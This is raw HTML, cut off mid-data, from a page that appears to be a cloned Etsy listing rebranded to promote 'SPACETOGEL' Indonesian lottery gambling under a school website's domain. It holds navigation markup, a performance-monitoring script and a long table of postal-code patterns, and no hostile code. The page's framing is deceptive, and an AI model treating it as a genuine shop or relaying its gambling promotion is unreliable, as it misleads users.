        <a aria-label="Cart" href="https://ppschool.org.in/stella/cart?ref=hdr-cart" class="wt-tooltip__trigger wt-tooltip__trigger--icon-only wt-btn wt-btn--transparent wt-btn--icon header-button">
            <span class="wt-z-index-1 wt-no-wrap wt-display-none ge-cart-badge wt-badge wt-badge--notificationPrimary wt-badge--small wt-badge--outset-top-right" data-selector="header-cart-count" aria-hidden="true">
                0
            </span>
            <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="m5.766 5-.618-3H1v2h2.518l2.17 10.535L6.18 17h14.307l2.4-12zM7.82 15l-1.6-8h14.227l-1.6 8z"/><path d="M10.667 20.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0m8.333 0a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0"/></svg></span>
        </a>
        <span role="tooltip" aria-hidden="true">Cart</span>
    </span>
</li>
    </ul>
</nav>
        </div>
    </header>

    
</div>

<nav class="wt-hide-xs wt-show-lg category-nav-button-menu">
    <div data-ui="cat-nav" id="desktop-category-topnav" class="cat-nav responsive-disabled v2-toolkit-cat-nav wt-ml-xs-0 wt-mr-xs-0">
        <div class="wt-text-caption wt-position-relative wt-bg-white wt-z-index-5 v2-toolkit-cat-nav-tab-bar">
            <div class="wt-body-max-width">
                <ul class="wt-list-unstyled wt-body-max-width wt-display-flex-xs wt-justify-content-center" data-menu-ui="menubar" data-ui="top-nav-category-list">
                      
                      <li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="-10" >
    <span class="wt-icon wt-icon--smaller-xs wt-nudge-b-1 wt-nudge-r-3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M5.535 7A4 4 0 0 1 12 2.354 4 4 0 0 1 18.465 7H22v9h-1v6H3v-6H2V7zm9.466 0H13V5a2 2 0 1 1 2.001 2M11 5a2 2 0 1 0-2.001 2H11zm-.764 4c-.55.614-1.348 1-2.236 1v2a4.98 4.98 0 0 0 3-1v3H4V9zM13 11c.836.628 1.874 1 3 1v-2a3 3 0 0 1-2.236-1H20v5h-7zm-8 5v4h6v-4zm8 4v-4h6v4z"/></svg></span><span>
    SPACETOGEL
</span>
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    >
    BANDAR TOGEL
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/?ref=bandar-slot"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="2" >
    TOGEL 4D
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    data-node-id="3" >
    SPACETOGEL LOGIN
  </a>
</li><li class="wt-mr-xs-3">
  <a
    href="https://ppschool.org.in/stella/"
    class="wt-btn wt-btn--transparent wt-btn--small "
    data-menu-ui="menuitem"
    data-ui="top-nav-category-link"
    
    >
   SPACETOGEL
  </a>
</li>
                      
                </ul>
            </div>
        </div>
    </div>
</nav></div>



<div class="wt-overlay wt-z-index-4" aria-hidden="true" data-ui="overlay"></div>

<noscript>
    <div class="wt-body-max-width wt-pt-xs-2 wt-pl-xs-2 wt-pr-xs-2 wt-pl-md-4 wt-pr-md-4 wt-pt-md-3 wt-pb-xs-0">
        <div id="javascript-nag" class="wt-alert wt-alert--inline wt-alert--success-01 wt-mb-xs-2">
            <div> Manfaatkan sepenuhnya fitur situs kami dengan mengaktifkan JavaScript. </div>
        </div>
    </div>
</noscript>
<div class="sidebar-cart-carat"></div>
        <div data-below-header>
            
        </div>
        

        

            <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
    var webVitals=function(e){"use strict";var t,n,i,r,o,a=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},u=function(e){if("loading"===document.readyState)return"loading";var t=a();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},c=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},s=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var i=e,r=i.id?"#"+i.id:c(i)+(i.classList&&i.classList.value&&i.classList.value.trim()&&i.classList.value.trim().length?"."+i.classList.value.trim().replace(/\s+/g,"."):"");if(n.length+r.length>(t||100)-1)return n||r;if(n=n?r+">"+n:r,i.id)break;e=i.parentNode}}catch(o){}return n},d=-1,f=function(e){addEventListener("pageshow",function(t){t.persisted&&(d=t.timeStamp,e(t))},!0)},l=function(){var e=a();return e&&e.activationStart||0},p=function(e,t){var n=a(),i="navigate";return d>=0?i="back-forward-cache":n&&(document.prerendering||l()>0?i="prerender":document.wasDiscarded?i="restore":n.type&&(i=n.type.replace(/_/g,"-"))),{name:e,value:void 0===t?-1:t,rating:"good",delta:0,entries:[],id:"v3-".concat(Date.now(),"-").concat(Math.floor(8999999999999*Math.random())+1e12),navigationType:i}},v=function(e,t,n){try{if(PerformanceObserver.supportedEntryTypes.includes(e)){var i=new PerformanceObserver(function(e){Promise.resolve().then(function(){t(e.getEntries())})});return i.observe(Object.assign({type:e,buffered:!0},n||{})),i}}catch(r){}},$=function(e,t,n,i){var r,o;return function(a){var u,c;t.value>=0&&(a||i)&&((o=t.value-(r||0))||void 0===r)&&(r=t.value,t.delta=o,t.rating=(u=t.value,u>(c=n)[1]?"poor":u>c[0]?"needs-improvement":"good"),e(t))}},m=function(e){requestAnimationFrame(function(){return requestAnimationFrame(function(){return e()})})},g=function(e){var t=function(t){"pagehide"!==t.type&&"hidden"!==document.visibilityState||e(t)};addEventListener("visibilitychange",t,!0),addEventListener("pagehide",t,!0)},y=function(e){var t=!1;return function(n){t||(e(n),t=!0)}},h=-1,T=function(){return"hidden"!==document.visibilityState||document.prerendering?1/0:0},b=function(e){"hidden"===document.visibilityState&&h>-1&&(h="visibilitychange"===e.type?e.timeStamp:0,S())},_=function(){addEventListener("visibilitychange",b,!0),addEventListener("prerenderingchange",b,!0)},S=function(){removeEventListener("visibilitychange",b,!0),removeEventListener("prerenderingchange",b,!0)},E=function(e){document.prerendering?addEventListener("prerenderingchange",function(){return e()},!0):e()},w={passive:!0,capture:!0},C=new Date,L=function(e,r){t||(t=r,n=e,i=new Date,x(removeEventListener),I())},I=function(){if(n>=0&&n<i-C){var e={entryType:"first-input",name:t.type,target:t.target,cancelable:t.cancelable,startTime:t.timeStamp,processingStart:t.timeStamp+n};r.forEach(function(t){t(e)}),r=[]}},k=function(e){if(e.cancelable){var t,n,i,r,o,a=(e.timeStamp>1e12?new Date:performance.now())-e.timeStamp;"pointerdown"==e.type?(t=a,n=e,i=function(){L(t,n),o()},r=function(){o()},o=function(){removeEventListener("pointerup",i,w),removeEventListener("pointercancel",r,w)},addEventListener("pointerup",i,w),addEventListener("pointercancel",r,w)):L(a,e)}},x=function(e){["mousedown","keydown","touchstart","pointerdown"].forEach(function(t){return e(t,k,w)})},P=0,B=1/0,D=0,N=function(e){e.forEach(function(e){e.interactionId&&(B=Math.min(B,e.interactionId),P=(D=Math.max(D,e.interactionId))?(D-B)/7+1:0)})},R=function(){return o?P:performance.interactionCount||0},A=function(){"interactionCount"in performance||o||(o=v("event",N,{type:"event",buffered:!0,durationThreshold:0}))},F=[200,500],H=0,q=function(){return R()-H},M=[],U={},V=function(e){var t=M[M.length-1],n=U[e.interactionId];if(n||M.length<10||e.duration>t.latency){if(n)n.entries.push(e),n.latency=Math.max(n.latency,e.duration);else{var i={id:e.interactionId,latency:e.duration,entries:[e]};U[i.id]=i,M.push(i)}M.sort(function(e,t){return t.latency-e.latency}),M.splice(10).forEach(function(e){delete U[e.id]})}},j=function(e,t){t=t||{},E(function(){A();var n,i,r=p("INP"),o=function(e){e.forEach(function(e){e.interactionId&&V(e),"first-input"!==e.entryType||M.some(function(t){return t.entries.some(function(t){return e.duration===t.duration&&e.startTime===t.startTime})})||V(e)});var t,n=M[t=Math.min(M.length-1,Math.floor(q()/50))];n&&n.latency!==r.value&&(r.value=n.latency,r.entries=n.entries,i())},a=v("event",o,{durationThreshold:null!==(n=t.durationThreshold)&&void 0!==n?n:40});i=$(e,r,F,t.reportAllChanges),a&&("interactionId"in PerformanceEventTiming.prototype&&a.observe({type:"first-input",buffered:!0}),g(function(){o(a.takeRecords()),r.value<0&&q()>0&&(r.value=0,r.entries=[]),i(!0)}),f(function(){M=[],H=R(),r=p("INP"),i=$(e,r,F,t.reportAllChanges)}))})},z=[2500,4e3],G={};return e.onINP=function(e,t){j(function(t){(function(e){if(e.entries.length){var t=e.entries.sort(function(e,t){return t.duration-e.duration||t.processingEnd-t.processingStart-(e.processingEnd-e.processingStart)})[0];e.attribution={eventTarget:s(t.target),eventType:t.name,eventTime:t.startTime,eventEntry:t,loadState:u(t.startTime)}}else e.attribution={}})(t),e(t)},t)},e.onLCP=function(e,t){var n,i;n=function(t){(function(e){if(e.entries.length){var t=a();if(t){var n=t.activationStart||0,i=e.entries[e.entries.length-1],r=i.url&&performance.getEntriesByType("resource").filter(function(e){return e.name===i.url})[0],o=Math.max(0,t.responseStart-n),u=Math.max(o,r?(r.requestStart||r.startTime)-n:0),c=Math.max(u,r?r.responseEnd-n:0),d=Math.max(c,i?i.startTime-n:0),f={element:s(i.element),timeToFirstByte:o,resourceLoadDelay:u-o,resourceLoadTime:c-u,elementRenderDelay:d-c,navigationEntry:t,lcpEntry:i};return i.url&&(f.url=i.url),r&&(f.lcpResourceEntry=r),void(e.attribution=f)}}e.attribution={timeToFirstByte:0,resourceLoadDelay:0,resourceLoadTime:0,elementRenderDelay:e.value}})(t),e(t)},i=(i=t)||{},E(function(){var e,t=(h<0&&(h=T(),_(),f(function(){setTimeout(function(){h=T(),_()},0)})),{get firstHiddenTime(){return h}}),r=p("LCP"),o=function(n){var i=n[n.length-1];i&&i.startTime<t.firstHiddenTime&&(r.value=Math.max(i.startTime-l(),0),r.entries=[i],e())},a=v("largest-contentful-paint",o);if(a){e=$(n,r,z,i.reportAllChanges);var u=y(function(){G[r.id]||(o(a.takeRecords()),a.disconnect(),G[r.id]=!0,e(!0))});["keydown","click"].forEach(function(e){addEventListener(e,function(){return setTimeout(u,0)},!0)}),g(u),f(function(t){r=p("LCP"),e=$(n,r,z,i.reportAllChanges),m(function(){r.value=performance.now()-t.timeStamp,G[r.id]=!0,e(!0)})})}})},Object.defineProperty(e,"__esModule",{value:!0}),e}({});
</script>

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">
        window.SPACETOGEL=window.SPACETOGEL||{};
        SPACETOGEL.Context=SPACETOGEL.Context||{};
        (function() {
            function assign(firstSource, secondSource) {
                if (!secondSource) return;
                var out = Object(firstSource);
                for (var key in secondSource) {
                    if (Object.prototype.hasOwnProperty.call(secondSource, key)) {
                        out[key] = secondSource[key];
                    }
                }
                return out;
            }
            SPACETOGEL.Context.feature=assign(SPACETOGEL.Context.feature ? SPACETOGEL.Context.feature : {}, {"profile_dropdown_to_help_center":false,"sitewide_si_mweb_gated_favoriting":false,"isAppShellEnabled":true,"core_fulfillment.product_level_readiness_states":false,"design_systems.buybox_performance_web_components":false,"seller_platform_web.buyer_inquiry":false,"seller_platform_web.seller_local_time":false,"seller_platform_web.item_detail_overlay":false,"buyer_promise.issue_resolution.fee_avoidance_v2":false,"content_moderation.convo_safety.structured_convos":false,"risk_experience.buyer_email_verification":false});
            SPACETOGEL.Context.data=assign(SPACETOGEL.Context.data ? SPACETOGEL.Context.data : {}, {"is_mobile":false,"should_auto_redirect":false,"locale_settings":{"language":{"code":"en-US","id":0,"name":"English (US)","translation":"English (US)","is_detected":false,"is_default":true},"currency":{"currency_id":360,"code":"IDR","name":"Indonesian Rupiah","number_precision":0,"symbol":"Rp","listing_enabled":true,"browsing_enabled":true,"buyer_location_restricted":false,"rate_updates_enabled":true,"is_synthetic":true,"is_detected":false,"is_default":false,"append_currency_symbol":false},"region":{"code":"ID","country_id":121,"name":"Indonesia","translation":"Indonesia","is_detected":false,"is_default":false,"is_EU_region":false},"subdir_code":""},"neu_api_specs_sample_rate":null,"FB_GRAPHQL_VERSION":"v2.10","page_guid":"ffbde3696ef.69632e5014d83cdc8fa2.00","primary_event_name":"view_listing","request_uuid":"EunhLnzL4sAYJypZdeOPahA2o_53","user_is_test_account":false,"user_id":null,"css_variant":"sasquatch","runtime_analysis":false,"collage_shadow_dom_css_url":"https:\/\/www.etsy.com\/ac\/sasquatch\/css\/collage\/shadow.b60eba69b0e074.css","fix_domready":true,"auto_yield":true,"vite_public_path":"https:\/\/www.etsy.com\/ac\/alphaVite\/js\/en-US\/","guest_uaid":["uj0nemGYfZm0u5UhoRQWjT5qMRzf","uj0nemGYfZm0u5UhoRQWjT5qMRzf"],"is_app_shell":true,"csrf_nonce":"3:1757443933:Mvi3gD28lGl_sMVoWBqRUvO_fPN7:fb5b3b0b6c9d621df07685fcadfae794290315e934e51dac8c5cc31a46f635c0","uaid_nonce":"3:1757443933:y6IRaUq1O7KIFfqDjKuVNvcfAysZ:e9f728fdc47b6a20961f8aef4d6743cf20348efc7ecb9616fd788cfe816da6a4","clientlogger":{"is_enabled":true,"endpoint":"\/clientlog","logs_per_page":6,"id":"EunhLnzL4sAYJypZdeOPahA2o_53","digest":"e45a20331c4c369cb55b4c17b23900bdd1979e0f","enabled_features":["info","warn","error","basic","uncaught"]},"01125905a4e5ddf2_appshell_fallback":"recs-impression","3c65557fa67e42dc_appshell_fallback":"bf47527aa0b4cf042","c5420ec98ed7db34_appshell_fallback":"b58bc9bdcc28e8c2a","imp_listener_sources":["ads","search","recs","nonlisting"],"impact_tracker_should_prompt_signin":false,"impact_tracker_should_direct_open":false,"shop_favorites_see_all_link":"See all","shop_favorites_search_header":"Shops you follow","is_mobile_shop_search":false,"show_simplified_mobile_header":false,"is_eligible_for_ship_to_setting_in_global_header":false,"remove_catnav_for_bots":false,"in_cart_count":0,"page_type":"view_listing","is_desktop_mini_favorites_operational_enabled":false,"clickable_nav":true,"has_dropdown":true,"add_vintage_node":false,"images_in_l2":false,"recs":[],"mweb_full_screen_search_dropdown":false,"relocate_cat_nav":false,"zero_pane_recent_searches":[],"is_eligible_to_fetch_category_suggestions":false,"category_suggestions_in_autosuggest_variant":null,"is_eligible_for_contentful_title_on_trending_searches":true,"is_eligible_for_always_show_shop_search":true,"is_eligible_for_search_bar_improvements":false,"is_eligible_for_refinement_pills_in_autosuggest":true,"mott_version":"761dfd2","catnav_show_sales":false,"catnav_gift_guide":"off","gifting_catnav_flyout_js":false,"should_show_registry_on_nav":false,"should_use_gifting_taxos_in_nav_flyout":false,"impact_message":{"footer_renewable_impact":{"impact_name":"footer_renewable_impact","impact_themes":["sustainability"],"impact_audiences":["buyers"]},"lp_impact_narrative_banner_carbon":{"impact_name":"lp_impact_narrative_banner_carbon","impact_themes":["carbon"],"impact_audiences":["buyers"]}},"airgap_url":"https:\/\/transcend-cdn.com\/cm\/ac71e058-41b7-4026-b482-3d9b8e31a6d0\/airgap.js","airgap_bundle":"control_bundle","dual_write_enabled":true,"google_tag_manager_async_enabled":false,"dynamic_privacy_settings_ui_enabled":false,"forced_data_regimes":"","has_forced_data_regimes":false,"all_purposes":["Advertising","Functional"],"all_regimes":["us-gpc","consent-prompt"],"default_consent_expiry":518400,"disable_advertising_regimes":[],"seller_is_viewing_own_listing":false,"listingId":4302118744,"listing_price":22.5,"shopId":25947065,"shop_id":25947065,"shop_name":"SPACETOGEL","custom_orders_listings2":true,"is_listing_preview":false,"checkout_decorator":"","was_landing_from_external_referrer":false,"should_collapse_neighbors":false,"should_open_single_content_toggle":false,"is_logged_in":false,"referring_listing_id":4302118744,"address_formats":{"0":{"postal_code_type":"postal","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"ZZ"},"55":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AF"},"306":{"postal_code_type":"postal","postal_code_pattern":"22\\d{3}","postal_code_placeholder":"","country_iso_code":"AX"},"57":{"postal_code_type":"Postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AL"},"95":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"DZ"},"250":{"postal_code_type":"zip","postal_code_pattern":"(96799)(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"AS"},"228":{"postal_code_type":"postal","postal_code_pattern":"AD[1-7]0\\d","postal_code_placeholder":"","country_iso_code":"AD"},"251":{"postal_code_type":"postal","postal_code_pattern":"(?:AI-)?2640","postal_code_placeholder":"","country_iso_code":"AI"},"59":{"postal_code_type":"postal","postal_code_pattern":"((?:[A-HJ-NP-Z])?\\d{4})([A-Z]{3})?","postal_code_placeholder":"","country_iso_code":"AR"},"60":{"postal_code_type":"postal","postal_code_pattern":"(?:37)?\\d{4}","postal_code_placeholder":"","country_iso_code":"AM"},"61":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"3393","country_iso_code":"AU"},"62":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AT"},"63":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"AZ"},"232":{"postal_code_type":"postal","postal_code_pattern":"(?:^|\\b)(?:1[0-2]|[1-9])\\d{2}(?:$|\\b)","postal_code_placeholder":"","country_iso_code":"BH"},"68":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BD"},"237":{"postal_code_type":"Postal","postal_code_pattern":"BB\\d{5}","postal_code_placeholder":"","country_iso_code":"BB"},"71":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"BY"},"65":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BE"},"225":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?[A-Z0-9]{2}","postal_code_placeholder":"","country_iso_code":"BM"},"76":{"postal_code_type":"Postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"BT"},"70":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"BA"},"74":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}-?\\d{3}","postal_code_placeholder":"","country_iso_code":"BR"},"255":{"postal_code_type":"postal","postal_code_pattern":"BBND 1ZZ","postal_code_placeholder":"","country_iso_code":"IO"},"231":{"postal_code_type":"postal","postal_code_pattern":"VG\\d{4}","postal_code_placeholder":"","country_iso_code":"VG"},"75":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?\\d{4}","postal_code_placeholder":"","country_iso_code":"BN"},"69":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"BG"},"135":{"postal_code_type":"postal","postal_code_pattern":"\\d{5,6}","postal_code_placeholder":"","country_iso_code":"KH"},"79":{"postal_code_type":"postal","postal_code_pattern":"[ABCEGHJKLMNPRSTVXY]\\d[ABCEGHJ-NPRSTV-Z] ?\\d[ABCEGHJ-NPRSTV-Z]\\d","postal_code_placeholder":"A1A 1A1","country_iso_code":"CA"},"222":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CV"},"247":{"postal_code_type":"postal","postal_code_pattern":"KY\\d-\\d{4}","postal_code_placeholder":"","country_iso_code":"KY"},"81":{"postal_code_type":"postal","postal_code_pattern":"\\d{7}","postal_code_placeholder":"","country_iso_code":"CL"},"82":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"CN"},"257":{"postal_code_type":"postal","postal_code_pattern":"6798","postal_code_placeholder":"","country_iso_code":"CX"},"258":{"postal_code_type":"postal","postal_code_pattern":"6799","postal_code_placeholder":"","country_iso_code":"CC"},"86":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"CO"},"87":{"postal_code_type":"postal","postal_code_pattern":"\\d{4,5}|\\d{3}-\\d{4}","postal_code_placeholder":"","country_iso_code":"CR"},"118":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"HR"},"88":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"CU"},"89":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CY"},"90":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"","country_iso_code":"CZ"},"93":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"DK"},"94":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"DO"},"96":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"EC"},"97":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EG"},"187":{"postal_code_type":"postal","postal_code_pattern":"CP [1-3][1-7][0-2]\\d","postal_code_placeholder":"CP 1101","country_iso_code":"SV"},"100":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EE"},"101":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"ET"},"262":{"postal_code_type":"postal","postal_code_pattern":"FIQQ 1ZZ","postal_code_placeholder":"","country_iso_code":"FK"},"241":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"FO"},"102":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"FI"},"103":{"postal_code_type":"postal","postal_code_pattern":"\\d{2} ?\\d{3}","postal_code_placeholder":"75000","country_iso_code":"FR"},"115":{"postal_code_type":"postal","postal_code_pattern":"9[78]3\\d{2}","postal_code_placeholder":"","country_iso_code":"GF"},"263":{"postal_code_type":"postal","postal_code_pattern":"987\\d{2}","postal_code_placeholder":"","country_iso_code":"PF"},"106":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"GE"},"91":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"80331","country_iso_code":"DE"},"226":{"postal_code_type":"postal","postal_code_pattern":"GX11 1AA","postal_code_placeholder":"","country_iso_code":"GI"},"112":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"104 31","country_iso_code":"GR"},"113":{"postal_code_type":"postal","postal_code_pattern":"39\\d{2}","postal_code_placeholder":"","country_iso_code":"GL"},"265":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"GP"},"266":{"postal_code_type":"zip","postal_code_pattern":"(969(?:[12]\\d|3[12]))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"GU"},"114":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"GT"},"305":{"postal_code_type":"postal","postal_code_pattern":"GY\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"GG"},"108":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"GN"},"110":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"GW"},"119":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HT"},"267":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HM"},"268":{"postal_code_type":"postal","postal_code_pattern":"00120","postal_code_placeholder":"","country_iso_code":"VA"},"117":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"HN"},"120":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"HU"},"126":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"IS"},"122":{"postal_code_type":"pin","postal_code_pattern":"^[1-9][0-9]{5}$","postal_code_placeholder":"110001","country_iso_code":"IN"},"121":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"ID"},"124":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}-?\\d{5}","postal_code_placeholder":"","country_iso_code":"IR"},"125":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"IQ"},"123":{"postal_code_type":"eircode","postal_code_pattern":null,"postal_code_placeholder":"","country_iso_code":"IE"},"269":{"postal_code_type":"postal","postal_code_pattern":"IM\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"IM"},"127":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}(?:\\d{2})?","postal_code_placeholder":"","country_iso_code":"IL"},"128":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"50100","country_iso_code":"IT"},"131":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}-?\\d{4}","postal_code_placeholder":"100-0001","country_iso_code":"JP"},"307":{"postal_code_type":"postal","postal_code_pattern":"JE\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}","postal_code_placeholder":"","country_iso_code":"JE"},"130":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"JO"},"132":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"KZ"},"133":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KE"},"137":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KW"},"134":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"KG"},"138":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LA"},"146":{"postal_code_type":"postal","postal_code_pattern":"LV-\\d{4}","postal_code_placeholder":"","country_iso_code":"LV"},"139":{"postal_code_type":"postal","postal_code_pattern":"(?:\\d{4})(?: ?(?:\\d{4}))?","postal_code_placeholder":"","country_iso_code":"LB"},"143":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"LS"},"140":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"LR"},"272":{"postal_code_type":"postal","postal_code_pattern":"948[5-9]|949[0-8]","postal_code_placeholder":"","country_iso_code":"LI"},"144":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LT"},"145":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"LU"},"151":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"MK"},"149":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"MG"},"159":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MY"},"238":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MV"},"227":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{3} ?\\d{2,4}","postal_code_placeholder":"","country_iso_code":"MT"},"274":{"postal_code_type":"zip","postal_code_pattern":"(969[67]\\d)(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"MH"},"275":{"postal_code_type":"postal","postal_code_pattern":"9[78]2\\d{2}","postal_code_placeholder":"","country_iso_code":"MQ"},"239":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}(?:\\d{2}|[A-Z]{2}\\d{3})","postal_code_placeholder":"","country_iso_code":"MU"},"276":{"postal_code_type":"postal","postal_code_pattern":"976\\d{2}","postal_code_placeholder":"","country_iso_code":"YT"},"150":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"MX"},"277":{"postal_code_type":"zip","postal_code_pattern":"(9694[1-4])(?:[ 